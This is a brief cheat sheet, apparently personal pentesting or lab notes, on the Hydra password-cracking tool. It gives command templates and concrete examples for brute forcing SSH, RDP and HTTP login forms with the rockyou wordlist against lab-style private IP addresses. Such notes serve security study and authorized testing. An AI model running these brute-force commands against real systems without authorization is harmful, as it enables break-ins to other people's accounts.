Hydra

Hydra is a brute force online password cracking program

Introduction

  • Hydra is an online brute-force password cracking tool used to quickly "hack" system logins. The options you pass into Hydra depend on the service (protocol) you are attacking.

Commands

  • sudo hydra -l <Username> -P <Password-List> <Service-Name>://<IP-Address> - Brute forces the specified service using the specified username and wordlist.

    • Example 1 : sudo hydra -l molly -P /usr/share/wordlists/rockyou.txt ssh://10.10.161.54 - Brute forces SSH on the default port 22.

    • Example 2: sudo hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201 - Brute forces SSH on port 2222 (-s is used to specify the port number)

    • Example 3: sudo hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://192.168.50.202 - Brute forces RDP on its default port number, using a username list and a single password.

  • sudo hydra <IP-Address> http-post-form ":<Username>=^USER^&<Password>=^PASS^>:<Invalid-Response> - Brute forces the specified service using the specified username and wordlist.

    • Example 1: sudo hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.161.54 http-post-form "/login:username=^USER^&password=^PASS^:Your username or password is incorrect." -V - Brute force an HTTP login form that passes the 2 arguments username and password using the username molly and rockyou password list.

    • Example 2: sudo hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid" - Brute force an HTTP login form that passes the 2 argument fm_usr and fm_pwd

Last updated